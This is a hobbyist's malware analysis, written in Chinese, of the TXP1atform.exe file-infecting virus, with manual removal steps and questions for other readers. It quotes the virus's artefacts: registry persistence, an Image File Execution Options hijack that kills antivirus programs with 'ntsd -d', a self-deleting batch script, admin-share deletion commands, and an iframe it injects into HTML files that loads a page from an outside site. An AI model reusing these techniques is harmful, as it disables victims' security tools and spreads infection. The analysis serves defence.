TXP1atform.exe文件病毒分析与探究

 

进程映象名:TXP1atform.exe；
文件大小：81KB

感染后发生的改变：
1.在%systemroot%/system32/drivers文件夹下生成TXP1atform.exe文件；

2.在注册表[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run]下生成值名为Explorer,类型为REG_SZ,数据为%systemroot%/system32/drivers/TXP1atform.exe的键值项;(随机器启动)
3.修改注册表[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options]键值及添加子项，在该子键下的生成N多子项,这些子项均为主流的杀毒软件名，在每个子键中添加键值名为Debugger,类型REG_SZ,数据为ntsd -d 的键值项,使各种杀毒软件被NTSD作为调试对象而被‘杀死’,造成了所谓的映象劫持;
4.修改注册表[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced]键值项SuperHidden的数据为1,Hidden的数据为1,隐藏受保护文件;
5.修改注册表[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL]键值项CheckedValue的数据为0,使具隐藏属性的文件及文件夹不能被显示;

6.受感染的可执行文件的文件大小增加81KB，原因是该文件被病毒文件在其文件头写入了病毒体（即病毒自身,病毒文件大小81KB）.

7.执行染毒文件时，先加载前81KB（即病毒体）,病毒体以命令行方式在用户临时文件夹中(%temp%)生成xx$$.bat批处理文件，其中xx为随机数字.

8.xx$$.bat的内容为:
:try1
del "E:/Program Files/fenglei/fenglei.exe"
if exist "E:/Program Files/fenglei/fenglei.exe" goto try1
ren "E:/Program Files/fenglei/fenglei.exe.exe" "fenglei.exe"
if exist "E:/Program Files/fenglei/fenglei.exe.exe" goto try2
"E:/Program Files/fenglei/fenglei.exe"
:try2
del %0

(其中"E:/Program Files/fenglei/fenglei.exe"为受病毒感染的可执行文件,随文件的不同而不同)

9.染毒文件以xx$$.bat为父进程启动，xx$$.bat同时加载病毒文件TXP1atform.exe(该病毒位于%systemroot%/system32/drivers目录下，提取了当前染毒文件的图标).

10.TXP1atform.exe调用命令行shell程序cmd.exe执行以下操作:
cmd.exe /c net share F$ /del /y
cmd.exe /c net share E$ /del /y
cmd.exe /c net share C$ /del /y
cmd.exe /c net share A$ /del /y
cmd.exe /c net share admin$ /del /y
(删除系统的默认共享，似乎有点良心 or 想大权独揽?!)

10.再调用IE浏览器IEXPLORE.EXE, 命令行为 "%programfiles%/internet explorer/iexplore.exe" http://www.ipshougou.com/tj.htm

11.IE又调用%systemroot%/system32/verclsid.exe文件，命令行参数为 /s /c {FF393560-C2A7-11CF-BFF4-444553540000}
{FF393560-C2A7-11CF-BFF4-444553540000}在注册表中的描述为：
[HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{FF393560-C2A7-11CF-BFF4-444553540000}]
@="History"
[HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{FF393560-C2A7-11CF-BFF4-444553540000}/DefaultIcon]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,/
  00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,/
  64,00,6f,00,63,00,76,00,77,00,2e,00,64,00,6c,00,6c,00,2c,00,2d,00,32,00,30,/
  00,37,00,38,00,35,00,00,00
[HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{FF393560-C2A7-11CF-BFF4-444553540000}/InProcServer32]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,/
  00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,/
  64,00,6f,00,63,00,76,00,77,00,2e,00,64,00,6c,00,6c,00,00,00
"ThreadingModel"="Apartment"
[HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{FF393560-C2A7-11CF-BFF4-444553540000}/ShellFolder]
"Attributes"=dword:a0000004
(至今对注册表中所谓的CLSID搞不懂！痛苦！)
(verclsid.exe的作用也不懂，网上查阅说是MS中KB908531的补丁，但据说加载vercsid.exe后，在桌面空白处单击鼠标右键有机器假死现象。可直接删除之)

12.TXP1atform.exe加载入进程后，染毒文件的大小减小至原来大小，再次运行时，正常，无事发生。
13.在染毒文件所处的整个分区内，会生成desktop_1.ini,desktop_2.ini ..., ini文件的内容为当前系统日期.文件名中的数字增量估计是运行了病毒的次数.
14.当TXP1atform.exe处于进程中时，它会不断修改当前染毒文件所在分区里的所有可执行文件，受染文件均是较原来增加81KB大小。
15.病毒同时修改当前染毒文件所在分区里的htm*网页文件,在其文件尾写入以下内容：<iframe src=http://www.114Oldest.com/zz/mm.htm width=100 height=0></iframe>

16.还有未发现的情况等待发现...

分析所用到的工具：
1. vmware 虚拟机
2. procexp 进程管理器
3. regsnap 注册表快照工具
4. autoruns 系统启动项探测器
5. 天狼星 屏幕录象工具
6. 系统自身搜索工具

暂时的解决方案:
1.终止TXP1atform.exe进程; (防止其不断感染其它EXE文件和HTM文件)
2.修改以上提到的注册表键值:
 2.1---删除Image File Execution Options下的子项,使'杀毒'软件能被执行;
 2.2---删除run下的explorer键值,防止病毒随机器启动;
 2.3---改SuperHidden和Hidden 为0，CheckValue 为1, 显示文件;
3.在Image File Execution Options 下新建子项，名称为TXP1atform.exe，在其下新建键值,名称：debugger, 类型:REG_SZ, 数据: cmd.exe /c del /f /q /a 。当病毒要执行时,将其删除。现象：桌面中CMD窗口"一闪而过"。
4.在cmd.exe环境中执行
 4.1 pushd x:/ (将当前工作盘切换到染毒文件所在分区x中)
 4.2 del /f /s /q /a desktop_x.ini (x为具体数字1,2,3等)
5.修改htm源代码文件，去除文件尾部的 <iframe src=http://www.114Oldest.com/zz/mm.htm width=100 height=0></iframe> ,ME不懂XML编程，估计以上字段为指向某个页面,本机为单机环境,穷啊！

6.以上5点可以用批处理实现，估计有点复杂.编程实现应该也不是好难,但假若病毒感染了该EXE文件呢？正在以C＋＋尝试编写.

几点疑惑:
1.染毒文件执行后，即TXP1atform.exe进驻进程后，其文件大小恢复为原来大小.病毒体是如何从可执行文件中分离出来的呢？
2.尽管发生映象劫持，但运行中的杀毒软件，如ast.exe（超级巡警）,怎么会被终止呢？image file execution options 下的文件应该是将运行时才被作为参数导向的，怎么处于运行当中却被终止了呢?抑或是病毒文件restart杀毒软件，在生启的过程中被ntsd -d 终止掉。如果是那样的话，病毒文件又是如何restart杀毒软件进程的呢?
3.病毒文件是如何将其'插'入到可执行文件头的呢?其原理是什么？如何编程实现将其插入与分离呢？
4.专业用于病毒分析的工具有哪些呢？
5.关于病毒分析防范的权威、典型书籍有哪些呢？

热切希望：
小子技穷，望热心人能不吝指点，释惑！